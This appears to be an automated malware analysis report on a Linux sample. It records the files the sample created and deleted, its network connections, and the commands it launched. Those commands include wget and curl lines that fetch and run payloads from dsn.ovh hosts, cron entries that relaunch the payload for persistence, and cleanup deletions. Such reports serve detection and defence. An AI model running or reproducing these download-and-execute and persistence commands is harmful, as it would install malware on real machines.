Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /var/spool/cron/crontabs/root
- /etc/crontab
Malicious functions:
Launches processes:
- wget -nc http://dash.dsn.ovh/dns/sshd -q -P /var/tmp/
- crontab -l
- chmod 777 /var/tmp/retrict.sh
- grep -qxF * * * * * /usr/bin/flock -n /var/tmp/vm.lock -c \x27cd /var/tmp; ./sshd\x27
- wget -nc http://dash.dsn.ovh/dns/retrict.sh -q -P /var/tmp/
- rm -rf .pkexec
- /usr/bin/grep <0xaa>
- ./sinax
- wget -nc http://dash.dsn.ovh/dns/incbit -q -P /var/tmp/
- <0x11>
- wget -nc http://dash.dsn.ovh/dns/truct.sh -q -P /var/tmp/
- /bin/sh ./unix.sh
- rm retrict.sh
- chmod 777 /tmp/lushput
- wget -nc http://dash.dsn.ovh/dns/politrict.sh -q -P /var/tmp/
- crontab -
- chmod 777 /var/tmp/sinax
- chmod 777 /var/tmp/incbit
- grep -qxF 0 */6 * * * /usr/bin/flock -n /var/tmp/tmp.lock -c \x27cd /var/tmp; wget -nc http://main.dsn.ovh/dns/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://main.dsn.ovh/dns/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://main.dsn.ovh/dns/config.json; cd /var/tmp; curl http://main.dsn.ovh/dns/config.json -o config.json\x27
- grep -qxF
- rm truct.sh
- rm incbit
- wget -nc http://dash.dsn.ovh/dns/seasbit -q -P /tmp/
- <0x29>
- chmod 777 /var/tmp/unix.sh
- wget -nc http://dash.dsn.ovh/dns/config.json -q -P /var/tmp/
- nohup ./sshd
- grep -qxF * * * * * root /usr/bin/flock -n /var/tmp/vm.lock -c \x27cd /var/tmp; ./sshd\x27 /etc/crontab
- /bin/sh -c cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &
- rm -rf lushput systemd-private-fe08166ffe15421496d6058da3074826-logrotate.service-zEDqXe systemd-private-fe08166ffe15421496d6058da3074826-systemd-logind.service-J3TPlg systemd-private-fe08166ffe15421496d6058da3074826-systemd-timesyncd.service-0nv3Og tmux-0
- /bin/sh ./politrict.sh
- chmod 777 /tmp/seasbit
- wget -nc http://dash.dsn.ovh/dns/loadbit -q -P /tmp/
- chmod 777 /tmp/loadbit
- wget -nc http://dash.dsn.ovh/dns/lushput -q -P /tmp/
- chmod 777 /var/tmp/truct.sh
- wget -nc http://dash.dsn.ovh/dns/brict.sh -q -P /var/tmp/
- rm sinax
- rm -rf loadbit
- rm unix.sh
- /usr/bin/flock -n /var/tmp/vm.lock -c cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &
- wget -nc http://dash.dsn.ovh/dns/sinax -q -P /var/tmp/
- chmod 777 /var/tmp/politrict.sh
- wget -nc http://dash.dsn.ovh/dns/unix.sh -q -P /var/tmp/
- /bin/sh ./truct.sh
- rm brict.sh
- rm politrict.sh
- /bin/sh ./retrict.sh
- /bin/sh ./brict.sh
- /bin/sh ./sshd
- chmod 777 /var/tmp/sshd
- chmod 777 /var/tmp/brict.sh
- crontab -crontab -l
Performs operations with the file system:
Modifies file access rights:
- /var/tmp/sinax
- /var/tmp/unix.sh
- /var/tmp/sshd
- /var/spool/cron/crontabs/tmp.MtGTGR
- /var/tmp/truct.sh
- /var/spool/cron/crontabs/tmp.LoxhwO
- /var/tmp/brict.sh
- /var/spool/cron/crontabs/tmp.oT6mFA
- /var/tmp/retrict.sh
- /var/tmp/politrict.sh
- /tmp/lushput
- /tmp/loadbit
Deletes folders:
- /tmp/systemd-private-fe08166ffe15421496d6058da3074826-logrotate.service-zEDqXe/tmp
- /tmp/systemd-private-fe08166ffe15421496d6058da3074826-logrotate.service-zEDqXe
- /tmp/systemd-private-fe08166ffe15421496d6058da3074826-systemd-logind.service-J3TPlg/tmp
- /tmp/systemd-private-fe08166ffe15421496d6058da3074826-systemd-logind.service-J3TPlg
- /tmp/systemd-private-fe08166ffe15421496d6058da3074826-systemd-timesyncd.service-0nv3Og/tmp
- /tmp/systemd-private-fe08166ffe15421496d6058da3074826-systemd-timesyncd.service-0nv3Og
- /tmp/tmux-0
Creates or modifies files:
- /var/tmp/sinax
- /var/tmp/unix.sh
- /var/tmp/sshd
- /var/tmp/config.json
- /var/spool/cron/crontabs/tmp.MtGTGR
- /var/tmp/truct.sh
- /var/spool/cron/crontabs/tmp.LoxhwO
- /var/tmp/brict.sh
- /var/spool/cron/crontabs/tmp.oT6mFA
- /var/tmp/vm.lock
- /var/tmp/retrict.sh
- /var/tmp/politrict.sh
- /tmp/lushput
- /tmp/loadbit
Deletes files:
- /var/tmp/unix.sh
- /var/tmp/truct.sh
- /var/tmp/brict.sh
- /var/tmp/retrict.sh
- /var/tmp/politrict.sh
- /var/tmp/sinax
- /tmp/lushput
- /tmp/tmux-0/default
- /tmp/loadbit
Locks files:
- /var/tmp/vm.lock
Changes time of creation/access/modification of files:
- /var/tmp/sinax
- /var/tmp/unix.sh
- /var/tmp/sshd
- /var/tmp/config.json
- /var/spool/cron/crontabs
- /var/tmp/truct.sh
- /var/tmp/brict.sh
- /var/tmp/retrict.sh
- /var/tmp/politrict.sh
- /tmp/lushput
- /tmp/loadbit
Network activity:
Establishes connection:
- 8.#.8.8:53
- 19#.##.43.137:80
DNS ASK:
- da##.dsn.ovh
Sends data to the following servers:
- 19#.##.43.137:80
Receives data from the following servers:
- 19#.##.43.137:80
